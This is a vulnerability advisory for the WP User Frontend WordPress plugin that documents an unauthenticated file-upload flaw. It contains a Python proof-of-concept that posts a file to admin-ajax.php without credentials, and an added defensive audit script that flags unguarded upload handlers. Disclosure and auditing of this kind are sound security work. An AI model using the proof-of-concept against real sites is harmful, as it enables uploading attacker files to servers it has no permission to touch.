WP User Frontend [Unrestricted File Upload]
WP User Frontend plugin for WordPress suffers from an Unrestricted File Upload vulnerability
Description
WordPress plugin WP User Frontend suffers from an unrestricted file upload vulnerability. An attacker can exploit the wpuf_file_upload or wpuf_insert_image actions to upload any file which passes the WordPress mime and size checks.
The attack does not require any privilege to be performed. The mentioned actions are also available to non-privileged users, thus allowing anyone to upload files to the web server.
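For defenders reviewing plugin code for this class of issue, the following added example (not part of the original advisory and not the plugin's code) scans PHP source for AJAX upload handlers that contain no nonce or capability check. It relies on WordPress's `wp_ajax_<action>` / `wp_ajax_nopriv_<action>` hook naming; the sample PHP, the `demo_*` names and the guard/sink lists are constructed assumptions, and the check is a presence-only heuristic.

```python
import re

# Constructed PHP sample for illustration; NOT the WP User Frontend source.
SAMPLE_PHP = r"""<?php
add_action( 'wp_ajax_demo_upload', array( $obj, 'upload_file' ) );
add_action( 'wp_ajax_nopriv_demo_upload', array( $obj, 'upload_file' ) );
add_action( 'wp_ajax_nopriv_demo_checked', 'checked_upload' );
function upload_file() {
    $up = wp_handle_upload( $_FILES['demo_file'], array( 'test_form' => false ) );
    echo $up['url'];
}
function checked_upload() {
    check_ajax_referer( 'demo_nonce' );
    if ( ! current_user_can( 'upload_files' ) ) { wp_die(); }
    wp_handle_upload( $_FILES['demo_file'], array( 'test_form' => false ) );
}
"""

# add_action('wp_ajax_[nopriv_]<action>', 'callback' | array($obj, 'callback'))
HOOK_RE = re.compile(
    r"add_action\(\s*['\"]wp_ajax_(nopriv_)?(\w+)['\"]\s*,\s*"
    r"(?:array\(\s*[^,]+,\s*)?['\"](\w+)['\"]")
UPLOAD_SINKS = ("wp_handle_upload", "media_handle_upload", "move_uploaded_file")
GUARDS = ("check_ajax_referer", "wp_verify_nonce", "current_user_can")

def function_body(src, name):
    """Return the brace-balanced body of PHP function `name`, or ''."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit(src):
    """List (hook, callback, reach) for AJAX upload handlers with no guard call."""
    findings = []
    for nopriv, action, callback in HOOK_RE.findall(src):
        body = function_body(src, callback)
        if not any(sink in body for sink in UPLOAD_SINKS):
            continue  # handler does not store uploaded files
        if any(guard in body for guard in GUARDS):
            continue  # has a nonce or capability check (presence only, heuristic)
        reach = "unauthenticated" if nopriv else "any logged-in user"
        findings.append(("wp_ajax_" + nopriv + action, callback, reach))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_PHP):
        print(finding)
```

A finding means only that no guard call appears in the handler body; each flagged handler still needs manual review, since a check may live in a helper the handler calls.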
PoC
#!/usr/bin/python3
################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Pan Vag <[email protected]>
################################################################################
import requests
import tempfile

url = 'http://example.com/wp-admin/admin-ajax.php'

# AJAX action handled by the plugin
postData = {
    'action': 'wpuf_file_upload'
}

# Temporary test file with a .jpeg suffix and 32 bytes of filler
file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')
file.write('A'*32)
file.seek(0)
files = {'wpuf_file': file}

# No cookies or credentials are sent with the request
r = requests.post(url, data=postData, files=files)
file.close()

if r.text != 'error':
    print('Success!')
    print(r.text)
else:
    print('error')
exit(0)
INFO
- 4 February 2016
- Pan Vag
- wedevs.com
- wordpress.org
- 2.3.10
- WordPress 4.4.2
TIMELINE
- 2016-02-04: Vendor notified via support forums in WordPress.org
- 2016-02-05: Vendor responded
- 2016-02-05: Issue details sent to vendor
- 2016-02-06: Requested CVE ID
- 2016-02-06: Vendor implemented security checks
- 2016-02-06: Verified that this exploit is no longer valid
- 2016-02-08: Vendor released v2.3.11 which resolves this issue